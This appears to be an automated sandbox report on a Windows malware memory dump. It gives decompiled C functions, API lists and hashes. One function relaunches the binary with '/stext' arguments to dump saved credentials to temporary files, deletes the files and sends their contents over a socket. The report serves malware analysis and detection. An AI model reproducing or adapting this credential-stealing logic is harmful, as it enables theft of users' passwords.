0x00444e1e
0x00444e1f
0x00444e22
0x00444e25
0x00444e26
0x00444e2c
0x00444e36
0x00444e3e
0x00444e41
0x00444e4d
0x00444e51
0x00444e54
0x00444e56
0x00444e58
0x00444e5a
0x00444e5c
0x00444e64
0x00444e65
0x00444e68
0x00444e6b
0x00444e6b
0x00444e6c
0x00444e72
0x00444e7c
0x00444e7c
0x00444e5a
0x00444e56
0x00444e41
0x00444e14
0x00444e10
0x00444df7
0x00444dcb
0x00444dc3
0x00444e82
0x00444e88
0x00444e8a
0x00444efd
0x00444efd
0x00444f01
0x00444f11
0x00444f17
0x00444f19
0x00444f75
0x00444f75
0x00444f7d
0x00444f7e
0x00444f80
0x00444f99
0x00444f9c
0x00444ed9
0x00444eda
0x00000000
0x00444edf
0x00444fa2
0x00000000
0x00444fa2
0x00444f87
0x00444f92
0x00000000
0x00444f92
0x00444f1b
0x00444f1e
0x00444f21
0x00000000
0x00000000
0x00444f23
0x00444f23
0x00444f26
0x00444f29
0x00444f2c
0x00444f33
0x00444f38
0x00444f3a
0x00444f3e
0x00444f59
0x00444f5d
0x00444f5e
0x00444f61
0x00444f62
0x00444f6e
0x00444f64
0x00444f64
0x00444f64
0x00444f40
0x00444f40
0x00444f40
0x00444f4b
0x00444f50
0x00444f53
0x00444f53
0x00000000
0x00444f38
0x00444e8f
0x00444e92
0x00444e99
0x00444e9e
0x00000000
0x00000000
0x00444ea7
0x00444ead
0x00444eaf
0x00000000
0x00000000
0x00444eb1
0x00444eb5
0x00000000
0x00000000
0x00444ec9
0x00444ecf
0x00444ed1
0x00444ef5
0x00444ef8
0x00000000
0x00444ef8
0x00444ed3
0x00000000
0x00444d4f
0x00444d54
0x00444d5f
0x00444ee0
0x00444ee0
0x00444ee0
0x00444ee3
0x00444ee4
0x00000000
0x00444eec
0x00444d4d
0x00444d02
0x00444d07
0x00444d0e
0x00444d14
0x00000000
0x00444d14
0x00444cdc
0x00444cdf
0x00444ce9
0x00444ce9
0x00444cec
0x00444cef
0x00000000
0x00444cef
0x00444ce3
0x00444ce5
0x00444ce7
0x00000000
0x00000000
0x00000000
0x00444ce7
0x00444c93
0x00444c98
0x00444ca0
0x00000000
0x00444c2b
0x00444c30
0x00444c33
0x00444c38
0x00444fc5
0x00000000
0x00444fc5

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b407cce44cbca6bfc6fe22e79192bbf541fd537a69edfb13c2e2193602a989e5
Instruction ID: c2452020714a327a15126602a77df7d29e05aa848c51d3e456e95a8e52e6adec
Opcode Fuzzy Hash: b407cce44cbca6bfc6fe22e79192bbf541fd537a69edfb13c2e2193602a989e5
Instruction Fuzzy Hash: E3C10670D04245AFEF11DFA8D841BEEBBB4BF8A314F14415AE404A7392C7789D41CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB58, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 414
filesleepCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040FB58(void* __eflags, void* _a4, char _a28, char _a52, char _a76, char _a100) {
				char _v5;
				char _v6;
				char _v7;
				signed int _v12;
				char _v36;
				char _v60;
				char _v84;
				char _v108;
				char _v132;
				char _v156;
				char _v180;
				char _v204;
				char _v228;
				char _v252;
				char _v276;
				char _v300;
				char _v324;
				char _v348;
				short _v868;
				void* __ebx;
				void* __edi;
				signed int _t192;
				void* _t199;
				void* _t225;
				void* _t251;
				void* _t252;
				char _t253;
				void* _t442;
				void* _t445;
				void* _t448;

				_t448 = __eflags;
				GetModuleFileNameW(0,  &_v868, 0x104);
				_v5 = 0;
				_v6 = 0;
				E0040201F(0,  &_v348);
				E0040201F(0,  &_v324);
				E0040201F(0,  &_v300);
				E00417992( &_v156, 0x30, _t448, E00401EF9(E00416A77( &_v36)));
				E00401F11();
				E00417992( &_v276, 0x30, _t448, E00401EF9(E00416A77( &_v36)));
				E00401F11();
				E00417992( &_v252, 0x30, _t448, E00401EF9(E00416A77( &_v36)));
				E00401F11();
				E00401EF9( &_a52);
				_t436 = "\"";
				_t251 = E00413DBB(E00401E4F(E00402F9A(0,  &_v108, E00404303(0,  &_v132, E004042DF(0,  &_v60,  &_v868, _t448, E0040412C(0,  &_v84, L" /stext \"")), _t448,  &_v156), "\"", _t448, _t436)));
				E00401E54();
				E00401E54();
				E00401E54();
				while(1) {
					E00401E54();
					_t449 = _t251;
					if(_t251 != 0) {
						break;
					}
					Sleep(0x64);
					E00401EF9( &_a52);
					_t251 = E00413DBB(E00401E4F(E00402F9A(_t251,  &_v84, E00404303(_t251,  &_v60, E004042DF(_t251,  &_v132,  &_v868, __eflags, E0040412C(_t251,  &_v108, L" /stext \"")), __eflags,  &_v156), _t436, __eflags, _t436)));
					E00401E54();
					E00401E54();
					E00401E54();
				}
				E00401EF9( &_a76);
				_t252 = E00413DBB(E00401E4F(E00402F9A(_t251,  &_v84, E00404303(_t251,  &_v60, E004042DF(_t251,  &_v132,  &_v868, _t449, E0040412C(_t251,  &_v108, L" /stext \"")), _t449,  &_v276), _t436, _t449, _t436)));
				E00401E54();
				E00401E54();
				E00401E54();
				E00401E54();
				E00401EF9( &_a100);
				_v7 = E00413DBB(E00401E4F(E00402F9A(_t252,  &_v36, E00404303(_t252,  &_v180, E004042DF(_t252,  &_v204,  &_v868, _t449, E0040412C(_t252,  &_v228, L" /stext \"")), _t449,  &_v252), _t436, _t449, _t436)));
				E00401E54();
				E00401E54();
				E00401E54();
				E00401E54();
				_t192 = 0 | _t252 == 0x00000000;
				_v12 = _t192;
				if(_t252 == 0) {
					_t192 = _t192 + 1;
					_v12 = _t192;
				}
				if(_v7 == 0) {
					_v12 = _t192 + 1;
				}
				_t253 = 0;
				_t442 = 0;
				L8:
				L8:
				if(E0041735B(E00401E4F( &_v156),  &_v348) != 0) {
					_t253 = 1;
					DeleteFileW(E00401E4F( &_v156));
				}
				if(E0041735B(E00401E4F( &_v276),  &_v324) != 0) {
					_v5 = 1;
					DeleteFileW(E00401E4F( &_v276));
				}
				if(E0041735B(E00401E4F( &_v252),  &_v300) != 0) {
					_v6 = 1;
					DeleteFileW(E00401E4F( &_v252));
				}
				if(_t253 == 0 || _v5 == 0 || _v6 == 0) {
					goto L17;
				}
				L18:
				_t199 = E0040592C(0x45eb6c);
				_t463 = _t199;
				if(_t199 == 0) {
					E00402ECA(_t253, _t445 - 0x18, E00402ECA(_t253,  &_v228, E00402ECA(_t253,  &_v204, E00402ECA(_t253,  &_v180, E00402ECA(_t253,  &_v84, E0040704B( &_v60,  &_a28, 0x46b218), __eflags,  &_v348), __eflags, 0x46b218), __eflags,  &_v324), __eflags, 0x46b218), __eflags,  &_v300);
					_push(0x6a);
					E0040495D(_t253, 0x46b618, _t206, __eflags);
					E00401F11();
					E00401F11();
					E00401F11();
					E00401F11();
				} else {
					_t225 = E00416C0A(_t253,  &_v36, _v12);
					E00402E54(_t445 - 0x18, E00402ECA(_t253,  &_v228, E00402ECA(_t253,  &_v204, E00402ECA(_t253,  &_v180, E00402ECA(_t253,  &_v84, E00402ECA(_t253,  &_v60, E00402ECA(_t253,  &_v132, E0040704B( &_v108,  &_a28, 0x46b218), _t463,  &_v348), _t463, 0x46b218), _t463,  &_v324), _t463, 0x46b218), _t463,  &_v300), _t463, 0x46b218), _t225);
					_push(0x69);
					E0040495D(_t253, 0x46b618, _t233, _t463);
					E00401F11();
					E00401F11();
					E00401F11();
					E00401F11();
					E00401F11();
					E00401F11();
					E00401F11();
				}
				E00401F11();
				E00401E54();
				E00401E54();
				E00401E54();
				E00401F11();
				E00401F11();
				E00401F11();
				E00401F11();
				E00401F11();
				E00401F11();
				E00401F11();
				return E00401F11();
				L17:
				Sleep(0x1f4);
				_t442 = _t442 + 1;
				if(_t442 < 0xa) {
					goto L8;
				}
				goto L18;
			}

0x0040fb58
0x0040fb73
0x0040fb7f
0x0040fb82
0x0040fb85
0x0040fb90
0x0040fb9b
0x0040fbb8
0x0040fbc1
0x0040fbde
0x0040fbe7
0x0040fc04
0x0040fc0d
0x0040fc15
0x0040fc1f
0x0040fc6f
0x0040fc71
0x0040fc79
0x0040fc81
0x0040fd05
0x0040fd05
0x0040fd0a
0x0040fd0c
0x00000000
0x00000000
0x0040fc8d
0x0040fc96
0x0040fceb
0x0040fced
0x0040fcf5
0x0040fcfd
0x0040fd02
0x0040fd15
0x0040fd6a
0x0040fd6c
0x0040fd74
0x0040fd7c
0x0040fd84
0x0040fd8c
0x0040fdea
0x0040fded
0x0040fdf8
0x0040fe03
0x0040fe0e
0x0040fe17
0x0040fe1a
0x0040fe1f
0x0040fe21
0x0040fe22
0x0040fe22
0x0040fe29
0x0040fe2c
0x0040fe2c
0x0040fe35
0x0040fe37
0x00000000
0x0040fe39
0x0040fe53
0x0040fe5b
0x0040fe63
0x0040fe63
0x0040fe7f
0x0040fe87
0x0040fe91
0x0040fe91
0x0040fead
0x0040feb5
0x0040febf
0x0040febf
0x0040fec3
0x00000000
0x00000000
0x0040fee6
0x0040feee
0x0040fef3
0x0040fef5
0x00410047
0x0041004d
0x00410054
0x0041005f
0x0041006a
0x00410075
0x0041007d
0x0040fefb
0x0040ff01
0x0040ff85
0x0040ff8b
0x0040ff92
0x0040ff9d
0x0040ffa8
0x0040ffb3
0x0040ffbb
0x0040ffc3
0x0040ffcb
0x0040ffd3
0x0040ffd8
0x00410085
0x00410090
0x0041009b
0x004100a6
0x004100b1
0x004100bc
0x004100c7
0x004100cf
0x004100d7
0x004100df
0x004100e7
0x004100fa
0x0040fed1
0x0040fed6
0x0040fedc
0x0040fee0
0x00000000
0x00000000
0x00000000

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040FB73

Part of subcall function 00416A77: GetCurrentProcessId.KERNEL32(00000000,73BCFBB0,00000000,?,?,?,?,?,0040AE92,.vbs), ref: 00416A9E

Sleep.KERNEL32(00000064,0045E404), ref: 0040FC8D
DeleteFileW.KERNEL32(00000000,0045E404,0045E404,0045E404), ref: 0040FE63
DeleteFileW.KERNEL32(00000000,0045E404,0045E404,0045E404), ref: 0040FE91
DeleteFileW.KERNEL32(00000000,0045E404,0045E404,0045E404), ref: 0040FEBF
Sleep.KERNEL32(000001F4,0045E404,0045E404,0045E404), ref: 0040FED6

Part of subcall function 0040495D: send.WS2_32(?,00000000,00000000,00000000), ref: 004049D0

Strings

/stext ", xrefs: 0040FC2C, 0040FCA8, 0040FD27, 0040FDA1

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Delete$Sleep$CurrentModuleNameProcesssend
String ID: /stext "
API String ID: 2606709979-3856184850
Opcode ID: 764343b8b83317f7d07af086cc1d0a62b7d7b79488cdb09408d90921fc04030c
Instruction ID: 59e59f679ba92563b67a42f9c9248ec2e7d9d7c177d34acceff6d19f06b29ac0
Opcode Fuzzy Hash: 764343b8b83317f7d07af086cc1d0a62b7d7b79488cdb09408d90921fc04030c
Instruction Fuzzy Hash: 8EE14F319041189ACB18FBA5DC65AEE7375AF54308F0041BEF50A771E2EF785E89CA98

Uniqueness

Uniqueness Score: -1.00%

Function 0043CF2D, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0043CF2D(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				void* _t244;
				signed int _t247;
				signed int _t249;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				void* _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				intOrPtr _t283;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				intOrPtr _t293;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				signed int _t328;
				void* _t330;
				signed int _t332;
				void* _t333;
				intOrPtr _t334;
				signed int _t339;
				signed int _t340;
				intOrPtr* _t343;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				intOrPtr* _t362;
				signed int _t364;
				signed int _t370;
				intOrPtr* _t374;
				intOrPtr* _t377;
				void* _t380;
				intOrPtr* _t381;
				intOrPtr* _t382;
				signed int _t393;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t399;
				signed int* _t403;
				intOrPtr* _t410;
				intOrPtr* _t411;
				signed int _t421;
				short _t422;
				void* _t424;
				signed int _t425;
				signed int _t427;
				intOrPtr _t428;
				signed int _t431;
				intOrPtr _t432;
				signed int _t434;
				signed int _t437;
				intOrPtr _t443;
				signed int _t444;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				signed int _t456;
				signed int* _t457;
				intOrPtr* _t458;
				short _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				void* _t467;
				void* _t468;
				void* _t470;
				signed int _t471;
				void* _t472;
				void* _t474;
				signed int _t475;
				void* _t477;
				void* _t479;
				intOrPtr _t491;

				_t420 = __edx;
				_t461 = _t467;
				_t468 = _t467 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t357 = E0043E13D(__ecx, 0x6a6);
				_t240 = 0;
				_pop(_t370);
				if(_t357 == 0) {
					L20:
					return _t240;
				} else {
					_push(__edi);
					_t2 = _t357 + 4; // 0x4
					_t427 = _t2;
					 *_t427 = 0;
					 *_t357 = 1;
					_t443 = _a4;
					_t4 = _t443 + 0x30; // 0x43c72c
					_t241 = _t4;
					_push( *_t241);
					_v16 = _t241;
					_push(0x456444);
					_push( *0x4562fc);
					E0043CE6C(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
					_t470 = _t468 + 0x18;
					_v8 = 0x4562fc;
					while(1) {
						L2:
						_t244 = E004468E7(_t427, 0x351, 0x456440);
						_t471 = _t470 + 0xc;
						if(_t244 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t410 = _t8;
							_t339 =  *_v16;
							_v16 = _t410;
							_t411 =  *_t410;
							goto L4;
						}
						while(1) {
							L4:
							_t420 =  *_t339;
							if(_t420 !=  *_t411) {
								break;
							}
							if(_t420 == 0) {
								L8:
								_t340 = 0;
							} else {
								_t420 =  *((intOrPtr*)(_t339 + 2));
								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
									break;
								} else {
									_t339 = _t339 + 4;
									_t411 = _t411 + 4;
									if(_t420 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t370 = _v8 + 0xc;
							_v8 = _t370;
							_v12 = _v12 &  !( ~_t340);
							_t343 = _v16;
							_v16 = _t343;
							_push( *_t343);
							_push(0x456444);
							_push( *_t370);
							E0043CE6C(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
							_t470 = _t471 + 0x18;
							if(_v8 < 0x45632c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E0043E9A5(_t357);
									_t31 = _t443 + 0x28; // 0x30ff068b
									_t434 = _t427 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t443 + 0x28; // 0x30ff068b
											E0043E9A5( *_t32);
										}
									}
									_t33 = _t443 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t434 == 1;
										if(_t434 == 1) {
											_t34 = _t443 + 0x24; // 0x30ff0c46
											E0043E9A5( *_t34);
										}
									}
									 *(_t443 + 0x24) = 0;
									 *(_t443 + 0x1c) = 0;
									 *(_t443 + 0x28) = 0;
									 *((intOrPtr*)(_t443 + 0x20)) = 0;
									_t39 = _t443 + 0x40; // 0x10468b00
									_t240 =  *_t39;
								} else {
									_t20 = _t443 + 0x28; // 0x30ff068b
									_t437 = _t427 | 0xffffffff;
									_t491 =  *_t20;
									if(_t491 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t491 == 0) {
											_t21 = _t443 + 0x28; // 0x30ff068b
											E0043E9A5( *_t21);
										}
									}
									_t22 = _t443 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t437 == 1) {
											_t23 = _t443 + 0x24; // 0x30ff0c46
											E0043E9A5( *_t23);
										}
									}
									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
									_t26 = _t357 + 4; // 0x4
									_t240 = _t26;
									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
									 *(_t443 + 0x28) = _t357;
									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
								}
								goto L20;
							}
							goto L130;
						}
						asm("sbb eax, eax");
						_t340 = _t339 | 0x00000001;
						__eflags = _t340;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043603A();
					asm("int3");
					_push(_t461);
					_t463 = _t471;
					_t472 = _t471 - 0x1d0;
					_t247 =  *0x46900c; // 0x7c295e5c
					_v56 = _t247 ^ _t463;
					_t249 = _v40;
					_push(_t357);
					_push(_t443);
					_t444 = _v36;
					_push(_t427);
					_t428 = _v44;
					_v508 = _t428;
					__eflags = _t249;
					if(_t249 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t359 = 0;
						_v452 = 0;
						__eflags = _t444;
						if(__eflags == 0) {
							L79:
							E0043CF2D(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
							goto L80;
						} else {
							__eflags =  *_t444 - 0x4c;
							if( *_t444 != 0x4c) {
								L58:
								_push(0);
								_t255 = E0043CAF5(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
								_t474 = _t472 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t370 = 0;
									__eflags = 0;
									_t76 = _t428 + 0x20; // 0x43c71c
									_t421 = _t76;
									_t446 = 0;
									_v452 = _t421;
									do {
										__eflags = _t446;
										if(_t446 == 0) {
											L73:
											_t256 = _v456;
										} else {
											_t374 =  *_t421;
											_t257 =  &_v276;
											while(1) {
												__eflags =  *_t257 -  *_t374;
												_t428 = _v464;
												if( *_t257 !=  *_t374) {
													break;
												}
												__eflags =  *_t257;
												if( *_t257 == 0) {
													L66:
													_t370 = 0;
													_t258 = 0;
												} else {
													_t422 =  *((intOrPtr*)(_t257 + 2));
													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
													_v458 = _t422;
													_t421 = _v452;
													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
														break;
													} else {
														_t257 = _t257 + 4;
														_t374 = _t374 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t258;
												if(_t258 == 0) {
													_t359 = _t359 + 1;
													__eflags = _t359;
													goto L73;
												} else {
													_t259 =  &_v276;
													_push(_t259);
													_push(_t446);
													_push(_t428);
													L83();
													_t421 = _v452;
													_t474 = _t474 + 0xc;
													__eflags = _t259;
													if(_t259 == 0) {
														_t370 = 0;
														_t256 = 0;
														_v456 = 0;
													} else {
														_t359 = _t359 + 1;
														_t370 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t258 = _t257 | 0x00000001;
											_t370 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t446 = _t446 + 1;
										_t421 = _t421 + 0x10;
										_v452 = _t421;
										__eflags = _t446 - 5;
									} while (_t446 <= 5);
									__eflags = _t256;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t359;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t444 + 2) - 0x43;
								if( *(_t444 + 2) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
									if( *((short*)(_t444 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t261 = E00447A47(_t444, 0x456438);
											_t361 = _t261;
											_v472 = _t361;
											_pop(_t376);
											__eflags = _t361;
											if(_t361 == 0) {
												break;
											}
											_t263 = _t261 - _t444;
											__eflags = _t263;
											_v456 = _t263 >> 1;
											if(_t263 == 0) {
												break;
											} else {
												_t265 = 0x3b;
												__eflags =  *_t361 - _t265;
												if( *_t361 == _t265) {
													break;
												} else {
													_t431 = _v456;
													_t362 = 0x4562fc;
													_v460 = 1;
													do {
														_t266 = E00447A0D( *_t362, _t444, _t431);
														_t472 = _t472 + 0xc;
														__eflags = _t266;
														if(_t266 != 0) {
															goto L45;
														} else {
															_t377 =  *_t362;
															_t420 = _t377 + 2;
															do {
																_t334 =  *_t377;
																_t377 = _t377 + 2;
																__eflags = _t334 - _v468;
															} while (_t334 != _v468);
															_t376 = _t377 - _t420 >> 1;
															__eflags = _t431 - _t377 - _t420 >> 1;
															if(_t431 != _t377 - _t420 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t362 = _t362 + 0xc;
														__eflags = _t362 - 0x45632c;
													} while (_t362 <= 0x45632c);
													_t359 = _v472 + 2;
													_t267 = E004479BD(_t376, _t359, 0x456440);
													_t428 = _v464;
													_t447 = _t267;
													_pop(_t380);
													__eflags = _t447;
													if(_t447 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t268 = _v452;
															goto L54;
														} else {
															_push(_t447);
															_t270 = E00446A29(_t380,  &_v276, 0x83, _t359);
															_t475 = _t472 + 0x10;
															__eflags = _t270;
															if(_t270 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E0043603A();
																asm("int3");
																_push(_t463);
																_t465 = _t475;
																_t273 =  *0x46900c; // 0x7c295e5c
																_v556 = _t273 ^ _t465;
																_push(_t359);
																_t364 = _v540;
																_push(_t447);
																_push(_t428);
																_t432 = _v544;
																_v1292 = _t364;
																_v1276 = E00440492(_t364, _t380, _t420) + 0x278;
																_push( &_v1256);
																_t280 = E0043CAF5(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t477 = _t475 - 0x2e4 + 0x18;
																__eflags = _t280;
																if(_t280 != 0) {
																	_t101 = _t364 + 2; // 0x6
																	_t450 = _t101 << 4;
																	__eflags = _t450;
																	_t281 =  &_v280;
																	_v724 = _t450;
																	_t381 =  *((intOrPtr*)(_t450 + _t432));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t281 -  *_t381;
																		_t452 = _v724;
																		if( *_t281 !=  *_t381) {
																			break;
																		}
																		__eflags =  *_t281;
																		if( *_t281 == 0) {
																			L91:
																			_t282 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t281 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
																			_v718 = _t459;
																			_t452 = _v724;
																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
																				break;
																			} else {
																				_t281 = _t281 + 4;
																				_t381 = _t381 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t282;
																		if(_t282 != 0) {
																			_t382 =  &_v280;
																			_t424 = _t382 + 2;
																			do {
																				_t283 =  *_t382;
																				_t382 = _t382 + 2;
																				__eflags = _t283 - _v712;
																			} while (_t283 != _v712);
																			_v728 = (_t382 - _t424 >> 1) + 1;
																			_t286 = E0043E13D(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
																			_v740 = _t286;
																			__eflags = _t286;
																			if(_t286 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t452 + _t432));
																				_t125 = _t364 * 4; // 0xb652
																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
																				_t128 = _t432 + 8; // 0x8b56ff8b
																				_v748 =  *_t128;
																				_t391 =  &_v280;
																				_v720 = _t286 + 4;
																				_t290 = E0043FD84(_t286 + 4, _v728,  &_v280);
																				_t479 = _t477 + 0xc;
																				__eflags = _t290;
																				if(_t290 != 0) {
																					_t291 = _v712;
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					E0043603A();
																					asm("int3");
																					_t293 =  *0x46a508; // 0x0
																					return _t293;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t296 = E0043C802(_t364, _t391, _t432,  &_v708);
																						_t393 = _v712;
																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t393 = _v712;
																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
																						}
																					}
																					__eflags = _t364 - 2;
																					if(_t364 != 2) {
																						__eflags = _t364 - 1;
																						if(_t364 != 1) {
																							__eflags = _t364 - 5;
																							if(_t364 == 5) {
																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
																						}
																					} else {
																						_t457 = _v736;
																						_t425 = _t393;
																						_t403 = _t457;
																						 *(_t432 + 8) = _v716;
																						_v720 = _t457;
																						_v728 = _t457[8];
																						_v716 = _t457[9];
																						while(1) {
																							_t154 = _t432 + 8; // 0x8b56ff8b
																							__eflags =  *_t154 -  *_t403;
																							if( *_t154 ==  *_t403) {
																								break;
																							}
																							_t458 = _v720;
																							_t425 = _t425 + 1;
																							_t328 =  *_t403;
																							 *_t458 = _v728;
																							_v716 = _t403[1];
																							_t403 = _t458 + 8;
																							 *((intOrPtr*)(_t458 + 4)) = _v716;
																							_t364 = _v752;
																							_t457 = _v736;
																							_v728 = _t328;
																							_v720 = _t403;
																							__eflags = _t425 - 5;
																							if(_t425 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t425 - 5;
																							if(__eflags == 0) {
																								_t178 = _t432 + 8; // 0x8b56ff8b
																								_t319 = E00447A8C(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x4563b8, 0x7f,  &_v536,  *_t178, 1);
																								_t479 = _t479 + 0x1c;
																								__eflags = _t319;
																								_t320 = _v712;
																								if(_t319 == 0) {
																									_t457[1] = _t320;
																								} else {
																									do {
																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t323 = E00432E71( &_v536,  *0x469170, 0xfe);
																									_t479 = _t479 + 0xc;
																									__eflags = _t323;
																									_t457[1] = 0 | _t323 == 0x00000000;
																								}
																								_t193 = _t432 + 8; // 0x8b56ff8b
																								 *_t457 =  *_t193;
																							}
																							 *(_t432 + 0x18) = _t457[1];
																							goto L121;
																						}
																						__eflags = _t425;
																						if(_t425 != 0) {
																							 *_t457 =  *(_t457 + _t425 * 8);
																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
																							 *(_t457 + _t425 * 8) = _v728;
																							 *(_t457 + 4 + _t425 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					_t297 = _t364 * 0xc;
																					_t200 = _t297 + 0x4562f8; // 0x40df53
																					 *0x452464(_t432);
																					_t299 =  *((intOrPtr*)( *_t200))();
																					_t396 = _v732;
																					__eflags = _t299;
																					if(_t299 == 0) {
																						__eflags = _t396 - 0x4692a8;
																						if(_t396 != 0x4692a8) {
																							_t456 = _t364 + _t364;
																							__eflags = _t456;
																							asm("lock xadd [eax], ecx");
																							if(_t456 != 0) {
																								goto L126;
																							} else {
																								_t218 = _t456 * 8; // 0x30ff068b
																								E0043E9A5( *((intOrPtr*)(_t432 + _t218 + 0x28)));
																								_t221 = _t456 * 8; // 0x30ff0c46
																								E0043E9A5( *((intOrPtr*)(_t432 + _t221 + 0x24)));
																								_t224 = _t364 * 4; // 0xb652
																								E0043E9A5( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
																								_t399 = _v712;
																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
																							}
																						}
																						_t397 = _v740;
																						 *_t397 = 1;
																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
																					} else {
																						 *(_v724 + _t432) = _t396;
																						_t205 = _t364 * 4; // 0xb652
																						E0043E9A5( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
																						E0043E9A5(_v740);
